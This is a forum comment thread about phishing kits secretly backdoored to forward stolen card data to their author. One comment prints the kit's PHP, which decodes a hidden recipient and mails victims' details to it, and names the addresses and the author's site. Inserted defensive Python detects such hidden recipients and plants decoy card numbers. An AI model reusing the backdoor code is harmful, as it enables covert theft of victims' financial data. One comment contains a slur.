Phishing Group Caught Stealing From Other Phishers
An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them.
Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."
But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
The real "Libtards" are the Libertarians!
Hey, it's open source. Information wants to be free. It's all about sharing. Why shouldn't the developer of the phishing kit get some reward from the organization that profits from repackaging his code?
If they really wanted to do it right, they could just pool all their resources and split the rewards. They could even invite others to join in, with a BotNet@Home project. Lend your computer to the BotNet, and get a prorated share of the take from stolen credit cards credited to your PayPal account.
Maybe they should bring charges against the script makers. That'd show everyone involved!
...phishers phish phishers... Say that five times fast.
Now if my mom falls victim to a phishing scam, I can rest assured now that her information is in the hands of even more phishers.
Technology Forum
Except they are actually double feeding off innocent people... some poor chap's info gets stolen by both the guy who deployed the phishing kit and the guy who wrote it... which means it's probably at least twice as likely to get used for fraud.
World of Netcraft.
Phish from a man and you take advantage of him for a day.
Give a man a phishing kit and you take advantage of him for a lifetime.
(of course by "man" we mean spotty-faced script kiddie, and by "lifetime" we mean until he wipes his hard disk, but proverbs are meant to be pithy and brief, not accurate.)
Soylent Green is peoplicious!
Of course all the big names are listed (Bank of America, Regions, etc), but it's too bad you can't zoom in on the screen shots. My local financial institution has been getting phished like crazy lately and it's always the same basic kit. Makes me wonder if it's this kit or something else. Whenever I get one of the emails I just have to check it out on my MacBook in Firefox with JS disabled just to see if it's anything novel. Never is.
:-)
Naturally Netcraft won't tell you the real site name
they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?
I work for the Department of Redundancy Department.
Ahhh! The meta master. [];
Here's his site: http://thebadboys.org/Brain/
Scandalous I say! This is just tooo literally virtually phishy. Thieves without a code of honour. Is there no honour among thieves? Real fishermen can't... wait, they can poach, and steal others' fish.
Anybody got a literal virtual stick of dynamite to blow up the caught fish?
Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
.. you just can't trust malware anymore!
Really though, this is nothing new. IIRC, some builds of Sub7 had a reverse backdoor (not covered in the wiki article), as well as a master password that let the Sub7 crew take over a server (covered by the wiki article), and some builds even included a hard drive killer that triggered when the master password was in use.
What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?
It reminds me of the ol' days on instant messaging when people would pass around a supposed 'Nuke' program that would allow them to reboot people's computers, only to discover that their own computer crashed soon after.
Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".
The grass is always greener on the other side of the light cone.
Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
Isn't it trivial for a government agency like the FBI or Treasury to track payments charged to any kind of electronic banking back to the recipient? Wouldn't an investigation "following the money" ultimately lead you to either the thief or at least greatly disrupt his activities? At a minimum it would expose the people that made their transactions work (banks, hosting companies, other otherwise "normal" business people).
A couple of decent RICO prosecutions and you would drive this stuff out of the United States and greatly reduce the scale of it.
But it never happens, and I can only think that the government has somehow turned these people into some espionage rabbit hole and that high-level prosecutions would disrupt intelligence gathering. Because there is little reason the government couldn't do something about it if they wanted to.
Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source. Then everyone receiving this spam can provide so many bad account numbers that phishing is very difficult to do without drawing attention to yourself.
It's amazing how many large websites are so vulnerable to even basic attacks. SQL injection is still rampant (a simple, well-devised Google search can show you that) and many corporations leave credit card numbers unencrypted. Somebody with basic knowledge of SQL could attack a large number of organizations without any trouble. I've seen this happen to too many people for me to ever trust important information to smaller sites.
We're all hypocrites. We all have hidden parts, it's the contrast between them that make us more a hypocrite than others
One phisher to phish them all!
In the old days, if thieves stole from thieves, it meant the first thief was deprived of the stolen goods. This led to conflict. However, with information like this, all it means is that *two* thieves have the same info.
This isn't news. Phishers have always taken advantage of script kiddies to obtain more credit card numbers or the like. Slashdot feels like it is run by 13 year olds. They know what a GeForce 8800 Ultra is, they know what DDR RAM is, they know what Linux and Unix are, but they are hardly advanced computer users.
Not wanting to spoil the optimistic spirit of your own post :o)
Wikileaks, no DNS
I can understand that people do hacking for fun... to show off their programming capabilities... but these kinds of activities are forked off by greed... which causes these guys to go any way... I mean doing anything out of the way to get a grab at others' grub...
It's a shame!!!
What we need are free phishing kits with trojans that report phishing sites to phishing filter databases or, better yet, to the administrators of the site they're trying to emulate, since they'd have the most incentive to take action. The hard part is hiding the trojan and the traffic it generates.
You want fun, go home and buy a monkey!
hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so whats the problem?
There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of phishing is to look as safe and legit as possible*. If, for example, my mother-in-law gets an email from Mr. BadGuy Phisher offering (of all things) heavily discounted embroidery pattern files for her embroidery machine. She thinks he really has such files for sale, she actually does want the product, so she provides her real CC# and not the false one. Now, this is a woman who is keenly aware of the potential for credit card fraud and identity theft. I have seen her save all of her receipts and manual charge slips in a shopping bag so her husband can burn them out in the shop. She is convinced that Bad Men are rooting through trash to collect CCs and banking info. She is convinced that these Bad Men are somehow able to access her account based on the string of numbers that appears on the receipt when she uses her debit card.
Yet, despite this paranoia, she still buys hordes of knick-knacks, limited edition "collectibles", sewing supplies and such on eBay. PayPal being too scary for her, she uses her CC to pay for all of that. Try as I might, I can't seem to persuade her that a person in CA selling cutesy crocheted animal sweaters could be a Bad Man just as easily as some person rooting through her trash. As for email based scams; well, I set up her email client to reject anyone not already in her address book and have trained her in the habit of sending the initial email to them, rather than waiting until she gets one. As a major side benefit for me, it has drastically cut down the number of "cute", "humorous" or "inspirational" forwards she sends me.
*The bar to appear safe and legit enough for some users can be staggeringly low. Let's face it, there are always going to be some stupid people around.
I need a wheelchair van for my son. Help me get the word out. https://www.gofundme.com/wheelchair-van-for-jj
what's the world come to when you can't trust someone selling phishing software!
If you mod me down, I will become more powerful than you can imagine....
Man. Remember when people wanted to use Credit Card numbers as proof of age for adult materials? Glad that never happened!
I Browse at +4 Flamebait
Open Source Sysadmin
Isn't "script kiddies" a form of inverted impartiality in the context of this, or any, summary? It's a bit ambiguous and frustrating to some in the way it only reflects the writer's point of view of who uses these programs. In the absence of a quirky and original last sentence, an anagram of "script kiddies" is "I predict kids".
It must have been something you assimilated. . . .
One of my ATM cards has 2 different PINs. If I use the alternative one, the transaction is completed normally (so no one on the spot gets wiser), but the institution will flag it and notify the police at once, providing my identity and location. I have to pay a little extra for it (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have had this since 1996, and I'm happy to say I have never needed it.
So yes, the banks know this kind of thing can be done. I wonder why other institutions don't do it or even why this is not mandatory for all cards.
I really don't mind the extra US$ 3/month for this service.
morcego
Back in the BBS days people used to post credit card numbers and phone card numbers as... somebody dumb has got to take the fall for this sh...
I read an even better possibility into this. What if the kit was released by VISA/Master card, Discover, and American Express. They would have a front line into shutting down stolen card numbers, canceling cards and getting great data including IP addresses. Working with merchants, they could follow the canceled sales for a great bust of the ring. Brilliant if true.
The truth shall set you free!
RE: There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of phishing is to look as safe and legit as possible*. ...C'mon, you can't spot an email from phishers? Not everyone will be able to recognize a phishing scheme, but a large percentage will. That's all that matters once the rest is in operation. No?
It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.
Looking at the code more carefully you'll see..
details.php includes this in the phishing page form:
logon.php has these lines of code:
$d="details.php";
$erorr=file_get_contents($d);   // reads the kit's own phishing page as a plain string
// finds the first "102" marker in details.php, takes the 46 hex digits that follow it
// and decodes them: 46 hex digits = 23 bytes, the hidden recipient address
$IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));
and Mr-Brain.php has this:
$send="al-brain@hotmail.fr,albrain08@yahoo.fr";   // the visible addresses the kiddie is told to change
$str=array($send, $IP);                          // the decoded backdoor address is appended as a second recipient
foreach ($str as $send)
mail($send,$subject,$message,$headers);          // the victim's details go to both
Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.
The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com
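To make the analysis above repeatable on other kits, here is an added example (not part of the original post or of the kit itself) that does the same decode in Python and then generalizes it: it recovers the address hidden behind the "102" marker exactly the way the kit's pack("H*", substr(...)) does, and it also sweeps every kit file for long hex runs that decode to an e-mail address, so it does not depend on knowing the marker or the 46-digit length in advance. The kit files and the addresses in them are constructed placeholders (exfil.drop1@example.com, kiddie1@example.net, kiddie2@example.org), not the addresses reported in the thread.

```python
import re
from typing import Dict, List, Optional

# Constructed sample kit, modelled on the description in the thread (hidden "niarB"
# field whose value is "102" followed by the hex-encoded recipient). All addresses
# are placeholders.
BACKDOOR = "exfil.drop1@example.com"        # 23 chars -> 46 hex digits, as in the kit
SAMPLE_DETAILS_PHP = (
    '<form method="post" action="logon.php">\n'
    '<input type="text" name="user">\n'
    '<input type="password" name="pass">\n'
    f'<input type="hidden" name="niarB" value="102{BACKDOOR.encode().hex()}">\n'
    '</form>\n'
)
SAMPLE_MR_BRAIN_PHP = '<?php\n$send="kiddie1@example.net,kiddie2@example.org";\n'
SAMPLE_KIT: Dict[str, str] = {
    "details.php": SAMPLE_DETAILS_PHP,
    "Mr-Brain.php": SAMPLE_MR_BRAIN_PHP,
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
HEX_RUN_RE = re.compile(r"[0-9A-Fa-f]{16,}")


def decode_kit_backdoor(page: str, marker: str = "102", hex_len: int = 46) -> Optional[str]:
    """Mirror of the kit's own logic:
    pack("H*", substr($page, strpos($page, "102") + 3, 46)).
    Returns None when the marker is absent or the bytes are not valid hex/ASCII."""
    pos = page.find(marker)
    if pos < 0:
        return None
    blob = page[pos + len(marker): pos + len(marker) + hex_len]
    try:
        return bytes.fromhex(blob).decode("ascii")
    except ValueError:
        return None


def find_hex_encoded_emails(text: str) -> List[str]:
    """Generic sweep: for every run of 16+ hex digits, decode it at both nibble
    alignments (a marker such as "102" shifts the alignment by one digit) and keep
    any e-mail address found in the decoded bytes. Marker- and length-independent."""
    hits: List[str] = []
    for m in HEX_RUN_RE.finditer(text):
        run = m.group(0)
        for offset in (0, 1):
            chunk = run[offset:]
            chunk = chunk[: len(chunk) - (len(chunk) % 2)]   # even number of digits
            if len(chunk) < 16:
                continue
            decoded = bytes.fromhex(chunk).decode("latin-1")  # never raises
            for addr in EMAIL_RE.findall(decoded):
                if addr not in hits:
                    hits.append(addr)
    return hits


def audit_kit(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Split recipients into the ones visible in cleartext (what the deployer is told
    to edit) and the ones only reachable by decoding, i.e. the backdoor."""
    cleartext: List[str] = []
    hidden: List[str] = []
    for content in files.values():
        for addr in EMAIL_RE.findall(content):
            if addr not in cleartext:
                cleartext.append(addr)
    for content in files.values():
        for addr in find_hex_encoded_emails(content):
            if addr not in cleartext and addr not in hidden:
                hidden.append(addr)
    return {"cleartext": cleartext, "hidden": hidden}


if __name__ == "__main__":
    print("kit-style decode:", decode_kit_backdoor(SAMPLE_DETAILS_PHP))
    print("audit:", audit_kit(SAMPLE_KIT))
```

Run it against an unpacked kit by reading each .php file into the dictionary passed to audit_kit; anything that shows up under "hidden" is a recipient the person deploying the kit was never meant to see. The latin-1 decode in the sweep is deliberate: misaligned or partly binary runs decode to junk rather than raising, and the e-mail regex then simply finds nothing in them.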
I'd prefer a system where I could generate a credit card number every time I made a purchase online. Naturally, this is not going to work in stores or such, but at least online you could limit the damage one could do because the number works just once. Furthermore by noting where you've used the number you'd know exactly who has been leaking or misusing your number.
But that would only be useful when you're somehow "forced" to give your PIN, wouldn't it (eg. when there's a gun to your head)?
In the case of phishing you simply do not realize that you're giving away information to a fraudster! You actually truly, veritably believe that you're doing something harmless, eg. paying for that book on Amazon (probably a bad example, but you get the drift). So why would you use the 'poisoned PIN' in this situation?
FYI: this reminds me of that urban legend where you were supposed to enter your PIN backwards to get the same effect (transaction works out OK but the police are informed right away, etc...), amazing how many people believed that story... until I asked them what would then happen if your PIN read 1221. (yes, it *used* to be an old PIN number of mine, actually, it was my first ever... and no, that was 15 years ago and it's been changed plenty of times in the meantime and no, no use looking me up, I don't plan on using it again =)
If there is one thing to be learned on slashdot, it has to be sarcasm.
As in any betrayal in the dark world of crime, there is only one solution. Masterphish to thief: "Now phirst you get one warning. But iph you do it again, you will sleep with the phishes..."
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Just like a bunch of nasty, hungry rats caught in a trap together, they all start turning on each other. Bloody funny!
Windows guys please stop pissing on everyone and the Linux guys stop pissing in the wind, hoping to hit Windows guys!
Mr. Brain's Faggots?
What I want to see is financial institutions starting to use my chummer program; catch a phishing site and send the sharks a couple GB of stinking-fish-guts-quality data, until the computers crash and burn from the strain.
Apocalypse Cancelled, Sorry, No Ticket Refunds
Looking at the larger picture, I want as small an amount of fraud as possible because the cost of goods will be cheaper. Somebody has to recoup that $4000 or $8000 in your example, but what happens is that everyone pays for fraud; spread out over every purchase made, it is probably lower than the sales tax you pay on each individual transaction.
For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year. You'd also be amazed at the businesses (big box stores and little local stores) that will give you a discount for cash if you ask.
Exactly, in the chat rooms the criminals are far more worried about each other than about the forces of law and order. OK, they are concerned that the person might be from a security company (our guys) or a police officer. But they are rather more angry about 'rippers', criminals who take the money but never deliver the goods or take goods and don't pay for them.
In the Shadowcrew organization about a third of the management team was occupied as enforcers. In fact that is how they got caught: they ended up in a turf war and someone turned them in to the police.
As in all criminal organizations, the guys at the bottom get chicken feed. All the money flows up the pyramid, just like the Sopranos. A street drug dealer is likely to be in prison or dead in two to three years on average and makes less than minimum wage. The typical botnet herder makes less than they would flipping burgers. All the money flows up.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
Not so. My mobile company still does that.
While this is an urban legend, several legislatures have proposed requiring banks to have PIN "Panic Codes". http://www.snopes.com/business/bank/pinalert.asp
In the case of palindromic codes, just flip them inside out. i.e. 1221 becomes 2112.
All ideas^H^H^H^H^Hprocesses in this post are Patent Pending. (as well as the process of patenting all postings)
There is a new fad among criminals in my country that is called "flash kidnapping" (loose translation). They grab you, put a gun to your head, and drive you around to several ATM machines.
morcego
And what if my PIN is 1111? Should I enter the two's complement?
Many credit card companies offer a free, online service to generate a one-time use CC# (I know Citi and Discover are doing this). You just log on to your account, generate a number for online purchase, and it is only valid to be used that one time.
It allows you to make your purchase online a single time, and if that number gets stolen, any transactions on it are flagged as not yours. At that point, giving out your real number, ever, seems poor, unless you are trying to set up recurring charges.
There's always a bigger phish.
I know this is a bit off topic, but it is related. I'm in the middle of trying to get rid of a phisher/scammer who won an eBay auction of mine. They took over someone else's account (eBay knows about this), bid on my item and won. Then they requested that I send the laptop to Nigeria (in the auction I explicitly stated that I would only send it to the US, Canada, and the UK). I knew that this person was a scammer, it was fairly obvious from the wrong e-mail addresses and Engrish, so I told him/her to stop bothering me. I then get a bunch of fake e-mails to me claiming to be from PayPal and eBay, saying that once I send the laptop, PayPal will release the funds. This person is deliberately preventing me from getting a refund for the auction costs from eBay, and obviously, preventing me from selling this laptop (or at least delaying it). Needless to say, I'm getting pretty annoyed with this guy.
I was able to grab what I believe to be his IP address off of the headers from a couple of e-mails that he sent to me, and found his ISP, but that's about as far as I got. I think that it is actually his IP address, but I'm not sure. My current plan is to send all communications between him and me to eBay, PayPal and the FBI, and be done with it. Any suggestions?
My faith in humanity is shaken! :-)
Wow, so like a 200% chance it gets used for fraud?
"If you are going through hell, keep going." - Winston Churchill
Sure, your cards are getting double-hammered. But that just makes the fraud more conspicuous. Hopefully, your CC company has anti-fraud measures in place to track suspicious purchases.
Just do what I did, open up a bunch of cards, bury yourself, get bad credit. You can't open up accounts if your credit sucks. heh
Bullish Machine Tzar
I use this service for all my online store purchases.
The slick thing about this VAN software is that you can click a button and it populates all the fields in Internet Explorer for you. Unfortunately, I use Firefox, and I've yet to get it to work. So I just copy the numbers across.
You've paid ((2008-1996)*12*3) $432 to "save" you if someone jacks you at the ATM... which typically has a limit of $300 per transaction. And you're paying for a service that is technically trivial to implement and should be given out for free in the first place. Nice.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
Citibank has this feature. They call it "Virtual Account Numbers."
Tsunami -- You can't bring a good wave down!
I never understood why creditors, or even government law enforcement, wouldn't set up dummy accounts and slap them onto a watch list. All they would have to do is discreetly release their "dummy" credit information, and let the morons come to them. It's a win-win situation.
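The "trojan account numbers" suggested earlier in the thread and the dummy accounts on a watch list proposed in the comment above are the same idea: canary card numbers that look real, pass every checksum a fraudster would run, and exist only so that their first use raises an alarm. The example below is added here and is not from any bank or from the original posts; it shows how such a registry could be built. The issuer range 400000 is assumed for the sample (it is not any real issuer's allocation), the HMAC secret and the authorization log lines are constructed, and the labels are placeholders for where each decoy was handed out.

```python
import hashlib
import hmac
from typing import Dict, List, Optional, Tuple


def luhn_check_digit(body: str) -> str:
    """Check digit that makes body + digit pass the Luhn (mod 10) test."""
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:          # every second digit from the right, starting next to the check digit
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(pan: str) -> bool:
    """True when the 16-digit PAN's last digit is its correct Luhn check digit."""
    pan = pan.replace(" ", "")
    return pan.isdigit() and len(pan) == 16 and luhn_check_digit(pan[:-1]) == pan[-1]


class CanaryRegistry:
    """Hands out Luhn-valid decoy PANs inside an assumed issuer range and remembers
    who each one was given to. A real deployment would also load these PANs into the
    authorization system so the transaction approves normally and the phisher learns
    nothing from the response, as the duress-PIN comment in the thread describes."""

    def __init__(self, issuer_bin: str, secret: bytes):
        self.issuer_bin = issuer_bin
        self.secret = secret            # constructed; keeps the account digits non-sequential
        self._planted: Dict[str, str] = {}

    def plant(self, label: str) -> str:
        # derive the account digits from a keyed hash of the label so decoys are
        # reproducible but not guessable from one another
        digest = hmac.new(self.secret, label.encode(), hashlib.sha256).hexdigest()
        account = str(int(digest, 16))[: 15 - len(self.issuer_bin)]
        body = self.issuer_bin + account
        pan = body + luhn_check_digit(body)
        self._planted[pan] = label
        return pan

    def match(self, pan: str) -> Optional[str]:
        """Label the PAN was planted under, or None for an ordinary card."""
        return self._planted.get(pan.replace(" ", ""))


def scan_authorizations(registry: CanaryRegistry, lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run constructed 'timestamp,merchant,pan,amount' authorization records past the
    registry and return (timestamp, merchant, label) for every canary that was used."""
    alerts = []
    for line in lines:
        ts, merchant, pan, _amount = line.split(",")
        label = registry.match(pan)
        if label is not None:
            alerts.append((ts, merchant, label))
    return alerts


# Constructed demo data: one decoy handed to a phishing page, one ordinary (also
# Luhn-valid) card number that must not trigger anything.
REGISTRY = CanaryRegistry(issuer_bin="400000", secret=b"constructed-demo-secret")
CANARY_PAN = REGISTRY.plant("phish-reply-2008-01-12")
ORDINARY_BODY = "400000987654321"
ORDINARY_PAN = ORDINARY_BODY + luhn_check_digit(ORDINARY_BODY)
SAMPLE_AUTHS = [
    f"2008-01-14T10:02:11Z,Bookshop Online,{ORDINARY_PAN},19.99",
    f"2008-01-14T10:05:40Z,Gift Cards 4 U,{CANARY_PAN},400.00",
]

if __name__ == "__main__":
    print("canary PAN:", CANARY_PAN, "luhn ok:", luhn_valid(CANARY_PAN))
    print("alerts:", scan_authorizations(REGISTRY, SAMPLE_AUTHS))
```

The point the thread's objection raises still stands: the scheme only works when the decoy, not the real number, is what reaches the phisher, so the registry is most useful when the institution itself (or a spam-trap) feeds decoys to phishing pages rather than relying on customers to choose the right number.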
Bank of America calls it "Shop Safe"
Or slashdot comments.
"There is no honor among thieves."
Actually, it's kind of comical that in games like World of Warcraft, not only do warriors and paladins talk about honor, but so too do rogues.
Cutpurs3: Yeah, have a little honor, won't you? Just go invis and stab the guy in the back.
(-1: Post disagrees with my already-settled worldview) is not a valid mod option.
Actually the idea is that if a crook puts a gun to your head and forces you to withdraw money, you can comply with the demand while also having an alert sent out immediately. Excellent security idea. A lot of crooks are forcing their victims to use their ATM cards or to give them the PIN, usually in kidnap situations. Giving the crisis code immediately sets the cops on the crooks, hopefully while you're still alive to appreciate it.
They can try either. I keep my cards almost maxed out so the most I can put on them is a half tank of gas and a pack of smokes
Since this is the first I've heard of such a Ponzi Scheme among phishers, I won't claim to know whether, overall, phishing or other identity theft victims will be better or worse off as a direct result. My first guess is that in the big picture, it won't be much of a difference to anybody, even the banks and their insurers.
I do know that I got a bit of visceral pleasure from the headline, and the idea of crooks fighting amongst themselves. Like a prison riot, if all the guards aren't safely on the other side of a good enough fence, it's not as funny as it sounds at first.
All 19 hijackers were known terrorists 09-10-2001. Lack of FBI intelligence does not justify warrantless wiretaps..
I used to take $40 out of the ATM every time I deposited a paycheck. Last year or so I've tried my hardest to use my bank's ATM/visa card as much as possible. I'm down to taking out a 20 about every 3 months. This means everything I buy I have a receipt for, and gets recorded in my checkbook. This goes into my computer, and gets categorized, so I can even tell you for example, how much I spent last year on transportation. (gas and vehicle maintenance) If you're paying everything in cash, you have to count that money and watch your budget all in your head. Maybe you're good with things like that, but that's not something I can do.
Also, my bank is a credit union, which means lots of good things. First, my card pulls from my savings account (as a "sharedraft") so I earn interest on every penny I have available to spend at any time. How much interest are you earning off that wad of 20's in your wallet?
Next, when I use the card as a visa, I don't pay any more, but my credit union takes a 2% cut from the retailer. I see that at the end of the month in the form of a dividend. That's sort of like the discount you have to ask for, but I don't have to ask for it, I always get it as long as I use it as a visa card.
I don't see much of an advantage in using cash nowadays unless you are paranoid about leaving a paper trail for someone trying to watch what you spend.
I work for the Department of Redundancy Department.